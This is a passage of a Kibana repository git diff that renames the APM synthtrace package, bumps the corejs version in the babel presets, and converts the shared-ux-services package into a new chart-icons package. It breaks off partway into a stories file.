b/packages/kbn-apm-synthtrace/package.json similarity index 86% rename from packages/elastic-apm-synthtrace/package.json rename to packages/kbn-apm-synthtrace/package.json index bbfcd496c922b..17d4c9b10b75b 100644 --- a/packages/elastic-apm-synthtrace/package.json +++ b/packages/kbn-apm-synthtrace/package.json @@ -1,5 +1,5 @@ { - "name": "@elastic/apm-synthtrace", + "name": "@kbn/apm-synthtrace", "version": "0.1.0", "description": "Elastic APM trace data generator", "license": "SSPL-1.0 OR Elastic License 2.0", diff --git a/packages/elastic-apm-synthtrace/src/.eslintrc.js b/packages/kbn-apm-synthtrace/src/.eslintrc.js similarity index 100% rename from packages/elastic-apm-synthtrace/src/.eslintrc.js rename to packages/kbn-apm-synthtrace/src/.eslintrc.js diff --git a/packages/elastic-apm-synthtrace/src/cli.ts b/packages/kbn-apm-synthtrace/src/cli.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/cli.ts rename to packages/kbn-apm-synthtrace/src/cli.ts diff --git a/packages/elastic-apm-synthtrace/src/cli/run_synthtrace.ts b/packages/kbn-apm-synthtrace/src/cli/run_synthtrace.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/cli/run_synthtrace.ts rename to packages/kbn-apm-synthtrace/src/cli/run_synthtrace.ts diff --git a/packages/elastic-apm-synthtrace/src/cli/scenario.ts b/packages/kbn-apm-synthtrace/src/cli/scenario.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/cli/scenario.ts rename to packages/kbn-apm-synthtrace/src/cli/scenario.ts diff --git a/packages/elastic-apm-synthtrace/src/cli/utils/get_common_services.ts b/packages/kbn-apm-synthtrace/src/cli/utils/get_common_services.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/cli/utils/get_common_services.ts rename to packages/kbn-apm-synthtrace/src/cli/utils/get_common_services.ts diff --git a/packages/elastic-apm-synthtrace/src/cli/utils/get_scenario.ts b/packages/kbn-apm-synthtrace/src/cli/utils/get_scenario.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/cli/utils/get_scenario.ts rename to packages/kbn-apm-synthtrace/src/cli/utils/get_scenario.ts diff --git a/packages/elastic-apm-synthtrace/src/cli/utils/interval_to_ms.ts b/packages/kbn-apm-synthtrace/src/cli/utils/interval_to_ms.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/cli/utils/interval_to_ms.ts rename to packages/kbn-apm-synthtrace/src/cli/utils/interval_to_ms.ts diff --git a/packages/elastic-apm-synthtrace/src/cli/utils/parse_run_cli_flags.ts b/packages/kbn-apm-synthtrace/src/cli/utils/parse_run_cli_flags.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/cli/utils/parse_run_cli_flags.ts rename to packages/kbn-apm-synthtrace/src/cli/utils/parse_run_cli_flags.ts diff --git a/packages/elastic-apm-synthtrace/src/cli/utils/start_historical_data_upload.ts b/packages/kbn-apm-synthtrace/src/cli/utils/start_historical_data_upload.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/cli/utils/start_historical_data_upload.ts rename to packages/kbn-apm-synthtrace/src/cli/utils/start_historical_data_upload.ts diff --git a/packages/elastic-apm-synthtrace/src/cli/utils/start_live_data_upload.ts b/packages/kbn-apm-synthtrace/src/cli/utils/start_live_data_upload.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/cli/utils/start_live_data_upload.ts rename to packages/kbn-apm-synthtrace/src/cli/utils/start_live_data_upload.ts diff --git a/packages/elastic-apm-synthtrace/src/cli/utils/synthtrace_worker.ts b/packages/kbn-apm-synthtrace/src/cli/utils/synthtrace_worker.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/cli/utils/synthtrace_worker.ts rename to packages/kbn-apm-synthtrace/src/cli/utils/synthtrace_worker.ts diff --git a/packages/elastic-apm-synthtrace/src/cli/utils/worker.js b/packages/kbn-apm-synthtrace/src/cli/utils/worker.js similarity index 100% rename from packages/elastic-apm-synthtrace/src/cli/utils/worker.js rename to packages/kbn-apm-synthtrace/src/cli/utils/worker.js diff --git a/packages/elastic-apm-synthtrace/src/index.ts b/packages/kbn-apm-synthtrace/src/index.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/index.ts rename to packages/kbn-apm-synthtrace/src/index.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/agent_config/agent_config.ts b/packages/kbn-apm-synthtrace/src/lib/agent_config/agent_config.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/agent_config/agent_config.ts rename to packages/kbn-apm-synthtrace/src/lib/agent_config/agent_config.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/agent_config/agent_config_fields.ts b/packages/kbn-apm-synthtrace/src/lib/agent_config/agent_config_fields.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/agent_config/agent_config_fields.ts rename to packages/kbn-apm-synthtrace/src/lib/agent_config/agent_config_fields.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/agent_config/index.ts b/packages/kbn-apm-synthtrace/src/lib/agent_config/index.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/agent_config/index.ts rename to packages/kbn-apm-synthtrace/src/lib/agent_config/index.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/agent_config/observer.ts b/packages/kbn-apm-synthtrace/src/lib/agent_config/observer.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/agent_config/observer.ts rename to packages/kbn-apm-synthtrace/src/lib/agent_config/observer.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/aggregators/service_latency_aggregator.ts b/packages/kbn-apm-synthtrace/src/lib/apm/aggregators/service_latency_aggregator.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/apm/aggregators/service_latency_aggregator.ts rename to packages/kbn-apm-synthtrace/src/lib/apm/aggregators/service_latency_aggregator.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/apm_error.ts b/packages/kbn-apm-synthtrace/src/lib/apm/apm_error.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/apm/apm_error.ts rename to packages/kbn-apm-synthtrace/src/lib/apm/apm_error.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/apm_fields.ts b/packages/kbn-apm-synthtrace/src/lib/apm/apm_fields.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/apm/apm_fields.ts rename to packages/kbn-apm-synthtrace/src/lib/apm/apm_fields.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/base_span.ts b/packages/kbn-apm-synthtrace/src/lib/apm/base_span.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/apm/base_span.ts rename to packages/kbn-apm-synthtrace/src/lib/apm/base_span.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/browser.ts b/packages/kbn-apm-synthtrace/src/lib/apm/browser.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/apm/browser.ts rename to packages/kbn-apm-synthtrace/src/lib/apm/browser.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/client/apm_synthtrace_es_client.ts b/packages/kbn-apm-synthtrace/src/lib/apm/client/apm_synthtrace_es_client.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/apm/client/apm_synthtrace_es_client.ts rename to packages/kbn-apm-synthtrace/src/lib/apm/client/apm_synthtrace_es_client.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/client/apm_synthtrace_kibana_client.ts b/packages/kbn-apm-synthtrace/src/lib/apm/client/apm_synthtrace_kibana_client.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/apm/client/apm_synthtrace_kibana_client.ts rename to packages/kbn-apm-synthtrace/src/lib/apm/client/apm_synthtrace_kibana_client.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/defaults/get_chrome_user_agent_defaults.ts b/packages/kbn-apm-synthtrace/src/lib/apm/defaults/get_chrome_user_agent_defaults.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/apm/defaults/get_chrome_user_agent_defaults.ts rename to packages/kbn-apm-synthtrace/src/lib/apm/defaults/get_chrome_user_agent_defaults.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/index.ts b/packages/kbn-apm-synthtrace/src/lib/apm/index.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/apm/index.ts rename to packages/kbn-apm-synthtrace/src/lib/apm/index.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/instance.ts b/packages/kbn-apm-synthtrace/src/lib/apm/instance.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/apm/instance.ts rename to packages/kbn-apm-synthtrace/src/lib/apm/instance.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/metricset.ts b/packages/kbn-apm-synthtrace/src/lib/apm/metricset.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/apm/metricset.ts rename to packages/kbn-apm-synthtrace/src/lib/apm/metricset.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/processors/get_breakdown_metrics.ts b/packages/kbn-apm-synthtrace/src/lib/apm/processors/get_breakdown_metrics.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/apm/processors/get_breakdown_metrics.ts rename to packages/kbn-apm-synthtrace/src/lib/apm/processors/get_breakdown_metrics.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/processors/get_span_destination_metrics.ts b/packages/kbn-apm-synthtrace/src/lib/apm/processors/get_span_destination_metrics.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/apm/processors/get_span_destination_metrics.ts rename to packages/kbn-apm-synthtrace/src/lib/apm/processors/get_span_destination_metrics.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/processors/get_transaction_metrics.ts b/packages/kbn-apm-synthtrace/src/lib/apm/processors/get_transaction_metrics.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/apm/processors/get_transaction_metrics.ts rename to packages/kbn-apm-synthtrace/src/lib/apm/processors/get_transaction_metrics.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/rum_span.ts b/packages/kbn-apm-synthtrace/src/lib/apm/rum_span.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/apm/rum_span.ts rename to packages/kbn-apm-synthtrace/src/lib/apm/rum_span.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/rum_transaction.ts b/packages/kbn-apm-synthtrace/src/lib/apm/rum_transaction.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/apm/rum_transaction.ts rename to packages/kbn-apm-synthtrace/src/lib/apm/rum_transaction.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/service.ts b/packages/kbn-apm-synthtrace/src/lib/apm/service.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/apm/service.ts rename to packages/kbn-apm-synthtrace/src/lib/apm/service.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/span.ts b/packages/kbn-apm-synthtrace/src/lib/apm/span.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/apm/span.ts rename to packages/kbn-apm-synthtrace/src/lib/apm/span.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/transaction.ts b/packages/kbn-apm-synthtrace/src/lib/apm/transaction.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/apm/transaction.ts rename to packages/kbn-apm-synthtrace/src/lib/apm/transaction.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/utils/aggregate.ts b/packages/kbn-apm-synthtrace/src/lib/apm/utils/aggregate.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/apm/utils/aggregate.ts rename to packages/kbn-apm-synthtrace/src/lib/apm/utils/aggregate.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/utils/create_picker.ts b/packages/kbn-apm-synthtrace/src/lib/apm/utils/create_picker.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/apm/utils/create_picker.ts rename to packages/kbn-apm-synthtrace/src/lib/apm/utils/create_picker.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/apm/utils/get_apm_write_targets.ts b/packages/kbn-apm-synthtrace/src/lib/apm/utils/get_apm_write_targets.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/apm/utils/get_apm_write_targets.ts rename to packages/kbn-apm-synthtrace/src/lib/apm/utils/get_apm_write_targets.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/entity.ts b/packages/kbn-apm-synthtrace/src/lib/entity.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/entity.ts rename to packages/kbn-apm-synthtrace/src/lib/entity.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/entity_generator.ts b/packages/kbn-apm-synthtrace/src/lib/entity_generator.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/entity_generator.ts rename to packages/kbn-apm-synthtrace/src/lib/entity_generator.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/entity_iterable.ts b/packages/kbn-apm-synthtrace/src/lib/entity_iterable.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/entity_iterable.ts rename to packages/kbn-apm-synthtrace/src/lib/entity_iterable.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/entity_streams.ts b/packages/kbn-apm-synthtrace/src/lib/entity_streams.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/entity_streams.ts rename to packages/kbn-apm-synthtrace/src/lib/entity_streams.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/interval.ts b/packages/kbn-apm-synthtrace/src/lib/interval.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/interval.ts rename to packages/kbn-apm-synthtrace/src/lib/interval.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/serializable.ts b/packages/kbn-apm-synthtrace/src/lib/serializable.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/serializable.ts rename to packages/kbn-apm-synthtrace/src/lib/serializable.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/stack_monitoring/cluster.ts b/packages/kbn-apm-synthtrace/src/lib/stack_monitoring/cluster.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/stack_monitoring/cluster.ts rename to packages/kbn-apm-synthtrace/src/lib/stack_monitoring/cluster.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/stack_monitoring/cluster_stats.ts b/packages/kbn-apm-synthtrace/src/lib/stack_monitoring/cluster_stats.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/stack_monitoring/cluster_stats.ts rename to packages/kbn-apm-synthtrace/src/lib/stack_monitoring/cluster_stats.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/stack_monitoring/index.ts b/packages/kbn-apm-synthtrace/src/lib/stack_monitoring/index.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/stack_monitoring/index.ts rename to packages/kbn-apm-synthtrace/src/lib/stack_monitoring/index.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/stack_monitoring/kibana.ts b/packages/kbn-apm-synthtrace/src/lib/stack_monitoring/kibana.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/stack_monitoring/kibana.ts rename to packages/kbn-apm-synthtrace/src/lib/stack_monitoring/kibana.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/stack_monitoring/kibana_stats.ts b/packages/kbn-apm-synthtrace/src/lib/stack_monitoring/kibana_stats.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/stack_monitoring/kibana_stats.ts rename to packages/kbn-apm-synthtrace/src/lib/stack_monitoring/kibana_stats.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/stack_monitoring/stack_monitoring_fields.ts b/packages/kbn-apm-synthtrace/src/lib/stack_monitoring/stack_monitoring_fields.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/stack_monitoring/stack_monitoring_fields.ts rename to packages/kbn-apm-synthtrace/src/lib/stack_monitoring/stack_monitoring_fields.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/stream_aggregator.ts b/packages/kbn-apm-synthtrace/src/lib/stream_aggregator.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/stream_aggregator.ts rename to packages/kbn-apm-synthtrace/src/lib/stream_aggregator.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/stream_processor.ts b/packages/kbn-apm-synthtrace/src/lib/stream_processor.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/stream_processor.ts rename to packages/kbn-apm-synthtrace/src/lib/stream_processor.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/timerange.ts b/packages/kbn-apm-synthtrace/src/lib/timerange.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/timerange.ts rename to packages/kbn-apm-synthtrace/src/lib/timerange.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/utils/clean_write_targets.ts b/packages/kbn-apm-synthtrace/src/lib/utils/clean_write_targets.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/utils/clean_write_targets.ts rename to packages/kbn-apm-synthtrace/src/lib/utils/clean_write_targets.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/utils/create_logger.ts b/packages/kbn-apm-synthtrace/src/lib/utils/create_logger.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/utils/create_logger.ts rename to packages/kbn-apm-synthtrace/src/lib/utils/create_logger.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/utils/dedot.ts b/packages/kbn-apm-synthtrace/src/lib/utils/dedot.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/utils/dedot.ts rename to packages/kbn-apm-synthtrace/src/lib/utils/dedot.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/utils/generate_id.ts b/packages/kbn-apm-synthtrace/src/lib/utils/generate_id.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/utils/generate_id.ts rename to packages/kbn-apm-synthtrace/src/lib/utils/generate_id.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/utils/get_synthtrace_environment.ts b/packages/kbn-apm-synthtrace/src/lib/utils/get_synthtrace_environment.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/utils/get_synthtrace_environment.ts rename to packages/kbn-apm-synthtrace/src/lib/utils/get_synthtrace_environment.ts diff --git a/packages/elastic-apm-synthtrace/src/lib/utils/merge_iterable.ts b/packages/kbn-apm-synthtrace/src/lib/utils/merge_iterable.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/lib/utils/merge_iterable.ts rename to packages/kbn-apm-synthtrace/src/lib/utils/merge_iterable.ts diff --git a/packages/elastic-apm-synthtrace/src/scenarios/agent_config.ts b/packages/kbn-apm-synthtrace/src/scenarios/agent_config.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/scenarios/agent_config.ts rename to packages/kbn-apm-synthtrace/src/scenarios/agent_config.ts diff --git a/packages/elastic-apm-synthtrace/src/scenarios/aws_lambda.ts b/packages/kbn-apm-synthtrace/src/scenarios/aws_lambda.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/scenarios/aws_lambda.ts rename to packages/kbn-apm-synthtrace/src/scenarios/aws_lambda.ts diff --git a/packages/elastic-apm-synthtrace/src/scenarios/kibana_stats.ts b/packages/kbn-apm-synthtrace/src/scenarios/kibana_stats.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/scenarios/kibana_stats.ts rename to packages/kbn-apm-synthtrace/src/scenarios/kibana_stats.ts diff --git a/packages/elastic-apm-synthtrace/src/scenarios/low_throughput.ts b/packages/kbn-apm-synthtrace/src/scenarios/low_throughput.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/scenarios/low_throughput.ts rename to packages/kbn-apm-synthtrace/src/scenarios/low_throughput.ts diff --git a/packages/elastic-apm-synthtrace/src/scenarios/many_services.ts b/packages/kbn-apm-synthtrace/src/scenarios/many_services.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/scenarios/many_services.ts rename to packages/kbn-apm-synthtrace/src/scenarios/many_services.ts diff --git a/packages/elastic-apm-synthtrace/src/scenarios/monitoring.ts b/packages/kbn-apm-synthtrace/src/scenarios/monitoring.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/scenarios/monitoring.ts rename to packages/kbn-apm-synthtrace/src/scenarios/monitoring.ts diff --git a/packages/elastic-apm-synthtrace/src/scenarios/simple_trace.ts b/packages/kbn-apm-synthtrace/src/scenarios/simple_trace.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/scenarios/simple_trace.ts rename to packages/kbn-apm-synthtrace/src/scenarios/simple_trace.ts diff --git a/packages/elastic-apm-synthtrace/src/scenarios/span_links.ts b/packages/kbn-apm-synthtrace/src/scenarios/span_links.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/scenarios/span_links.ts rename to packages/kbn-apm-synthtrace/src/scenarios/span_links.ts diff --git a/packages/elastic-apm-synthtrace/src/test/apm_events_to_elasticsearch_output.test.ts b/packages/kbn-apm-synthtrace/src/test/apm_events_to_elasticsearch_output.test.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/test/apm_events_to_elasticsearch_output.test.ts rename to packages/kbn-apm-synthtrace/src/test/apm_events_to_elasticsearch_output.test.ts diff --git a/packages/elastic-apm-synthtrace/src/test/event_dsl_behavior.test.ts b/packages/kbn-apm-synthtrace/src/test/event_dsl_behavior.test.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/test/event_dsl_behavior.test.ts rename to packages/kbn-apm-synthtrace/src/test/event_dsl_behavior.test.ts diff --git a/packages/elastic-apm-synthtrace/src/test/rate_per_minute.test.ts b/packages/kbn-apm-synthtrace/src/test/rate_per_minute.test.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/test/rate_per_minute.test.ts rename to packages/kbn-apm-synthtrace/src/test/rate_per_minute.test.ts diff --git a/packages/elastic-apm-synthtrace/src/test/scenarios/01_simple_trace.test.ts b/packages/kbn-apm-synthtrace/src/test/scenarios/01_simple_trace.test.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/test/scenarios/01_simple_trace.test.ts rename to packages/kbn-apm-synthtrace/src/test/scenarios/01_simple_trace.test.ts diff --git a/packages/elastic-apm-synthtrace/src/test/scenarios/02_transaction_metrics.test.ts b/packages/kbn-apm-synthtrace/src/test/scenarios/02_transaction_metrics.test.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/test/scenarios/02_transaction_metrics.test.ts rename to packages/kbn-apm-synthtrace/src/test/scenarios/02_transaction_metrics.test.ts diff --git a/packages/elastic-apm-synthtrace/src/test/scenarios/03_span_destination_metrics.test.ts b/packages/kbn-apm-synthtrace/src/test/scenarios/03_span_destination_metrics.test.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/test/scenarios/03_span_destination_metrics.test.ts rename to packages/kbn-apm-synthtrace/src/test/scenarios/03_span_destination_metrics.test.ts diff --git a/packages/elastic-apm-synthtrace/src/test/scenarios/04_breakdown_metrics.test.ts b/packages/kbn-apm-synthtrace/src/test/scenarios/04_breakdown_metrics.test.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/test/scenarios/04_breakdown_metrics.test.ts rename to packages/kbn-apm-synthtrace/src/test/scenarios/04_breakdown_metrics.test.ts diff --git a/packages/elastic-apm-synthtrace/src/test/scenarios/05_transactions_with_errors.test.ts b/packages/kbn-apm-synthtrace/src/test/scenarios/05_transactions_with_errors.test.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/test/scenarios/05_transactions_with_errors.test.ts rename to packages/kbn-apm-synthtrace/src/test/scenarios/05_transactions_with_errors.test.ts diff --git a/packages/elastic-apm-synthtrace/src/test/scenarios/06_application_metrics.test.ts b/packages/kbn-apm-synthtrace/src/test/scenarios/06_application_metrics.test.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/test/scenarios/06_application_metrics.test.ts rename to packages/kbn-apm-synthtrace/src/test/scenarios/06_application_metrics.test.ts diff --git a/packages/elastic-apm-synthtrace/src/test/scenarios/__snapshots__/01_simple_trace.test.ts.snap b/packages/kbn-apm-synthtrace/src/test/scenarios/__snapshots__/01_simple_trace.test.ts.snap similarity index 100% rename from packages/elastic-apm-synthtrace/src/test/scenarios/__snapshots__/01_simple_trace.test.ts.snap rename to packages/kbn-apm-synthtrace/src/test/scenarios/__snapshots__/01_simple_trace.test.ts.snap diff --git a/packages/elastic-apm-synthtrace/src/test/streams_merge.test.ts b/packages/kbn-apm-synthtrace/src/test/streams_merge.test.ts similarity index 100% rename from packages/elastic-apm-synthtrace/src/test/streams_merge.test.ts rename to packages/kbn-apm-synthtrace/src/test/streams_merge.test.ts diff --git a/packages/elastic-apm-synthtrace/tsconfig.json b/packages/kbn-apm-synthtrace/tsconfig.json similarity index 100% rename from packages/elastic-apm-synthtrace/tsconfig.json rename to packages/kbn-apm-synthtrace/tsconfig.json diff --git a/packages/kbn-babel-preset/node_preset.js b/packages/kbn-babel-preset/node_preset.js index 295ea5d0d8e8b..8fb06d0c293ba 100644 --- a/packages/kbn-babel-preset/node_preset.js +++ b/packages/kbn-babel-preset/node_preset.js @@ -31,7 +31,7 @@ module.exports = (_, options = {}) => { // Because of that we should use for that value the same version we install // in the package.json in order to have the same polyfills between the environment // and the tests - corejs: '3.21.1', + corejs: '3.23.5', bugfixes: true, ...(options['@babel/preset-env'] || {}), diff --git a/packages/kbn-babel-preset/webpack_preset.js b/packages/kbn-babel-preset/webpack_preset.js index 1f5a840f4f54d..02bc6270a8b00 100644 --- a/packages/kbn-babel-preset/webpack_preset.js +++ b/packages/kbn-babel-preset/webpack_preset.js @@ -18,7 +18,7 @@ module.exports = (_, options = {}) => { modules: false, // Please read the explanation for this // in node_preset.js - corejs: '3.21.1', + corejs: '3.23.5', bugfixes: true, }, ], diff --git a/packages/kbn-shared-ux-services/src/services/http.ts b/packages/kbn-chart-icons/.storybook/main.js similarity index 81% rename from packages/kbn-shared-ux-services/src/services/http.ts rename to packages/kbn-chart-icons/.storybook/main.js index 024222092b7b1..8dc3c5d1518f4 100644 --- a/packages/kbn-shared-ux-services/src/services/http.ts +++ b/packages/kbn-chart-icons/.storybook/main.js @@ -6,6 +6,4 @@ * Side Public License, v 1. */ -export interface SharedUxHttpService { - addBasePath: (url: string) => string; -} +module.exports = require('@kbn/storybook').defaultConfig; diff --git a/packages/kbn-shared-ux-services/BUILD.bazel b/packages/kbn-chart-icons/BUILD.bazel old mode 100755 new mode 100644 similarity index 88% rename from packages/kbn-shared-ux-services/BUILD.bazel rename to packages/kbn-chart-icons/BUILD.bazel index 1ed65b979a3e3..b3afcf893fd2e --- a/packages/kbn-shared-ux-services/BUILD.bazel +++ b/packages/kbn-chart-icons/BUILD.bazel @@ -2,16 +2,17 @@ load("@npm//@bazel/typescript:index.bzl", "ts_config") load("@build_bazel_rules_nodejs//:index.bzl", "js_library") load("//src/dev/bazel:index.bzl", "jsts_transpiler", "pkg_npm", "pkg_npm_types", "ts_project") -PKG_DIRNAME = "kbn-shared-ux-services" -PKG_REQUIRE_NAME = "@kbn/shared-ux-services" +PKG_DIRNAME = "kbn-chart-icons" +PKG_REQUIRE_NAME = "@kbn/chart-icons" SOURCE_FILES = glob( [ "src/**/*.ts", - "src/**/*.tsx", + "src/**/*.tsx" ], exclude = [ "**/*.test.*", + "**/*.stories.*" ], ) @@ -37,8 +38,10 @@ NPM_MODULE_EXTRA_FILES = [ # "@npm//name-of-package" # eg. "@npm//lodash" RUNTIME_DEPS = [ + "//packages/kbn-ui-theme", "@npm//react", - "@npm//rxjs", + "@npm//@elastic/eui", + "@npm//@emotion/css", ] # In this array place dependencies necessary to build the types, which will include the @@ -51,10 +54,12 @@ RUNTIME_DEPS = [ # # References to NPM packages work the same as RUNTIME_DEPS TYPES_DEPS = [ + "//packages/kbn-ui-theme:npm_module_types", "@npm//@types/node", "@npm//@types/jest", "@npm//@types/react", - "@npm//rxjs", + "@npm//@elastic/eui", + "@npm//@emotion/css", ] jsts_transpiler( @@ -70,6 +75,10 @@ jsts_transpiler( build_pkg_name = package_name(), root_input_dir = "src", web = True, + additional_args = [ + "--copy-files", + "--quiet" + ], ) ts_config( diff --git a/packages/kbn-chart-icons/README.md b/packages/kbn-chart-icons/README.md new file mode 100644 index 0000000000000..9e6f13e428e5a --- /dev/null +++ b/packages/kbn-chart-icons/README.md @@ -0,0 +1,5 @@ +# @kbn/chart-icons + +This package contains svg shared assets used in charts + +It can be removes when the [EuiIllustrations](https://github.com/elastic/eui/discussions/5546) initiative is shipped. diff --git a/packages/shared-ux/storybook/mock/jest.config.js b/packages/kbn-chart-icons/jest.config.js similarity index 82% rename from packages/shared-ux/storybook/mock/jest.config.js rename to packages/kbn-chart-icons/jest.config.js index f29327c23ca15..771b3dd8ff9b8 100644 --- a/packages/shared-ux/storybook/mock/jest.config.js +++ b/packages/kbn-chart-icons/jest.config.js @@ -8,6 +8,6 @@ module.exports = { preset: '@kbn/test/jest_node', - rootDir: '../../../..', - roots: ['/packages/shared-ux/storybook/mock'], + rootDir: '../..', + roots: ['/packages/kbn-chart-icons'], }; diff --git a/packages/kbn-shared-ux-services/package.json b/packages/kbn-chart-icons/package.json old mode 100755 new mode 100644 similarity index 81% rename from packages/kbn-shared-ux-services/package.json rename to packages/kbn-chart-icons/package.json index 7d7d999bf6961..c1f5912c1269e --- a/packages/kbn-shared-ux-services/package.json +++ b/packages/kbn-chart-icons/package.json @@ -1,5 +1,5 @@ { - "name": "@kbn/shared-ux-services", + "name": "@kbn/chart-icons", "private": true, "version": "1.0.0", "main": "./target_node/index.js", diff --git a/packages/kbn-chart-icons/src/__stories__/icons.stories.tsx b/packages/kbn-chart-icons/src/__stories__/icons.stories.tsx new file mode 100644 index 0000000000000..a9910001eb923 --- /dev/null +++ b/packages/kbn-chart-icons/src/__stories__/icons.stories.tsx @@ -0,0 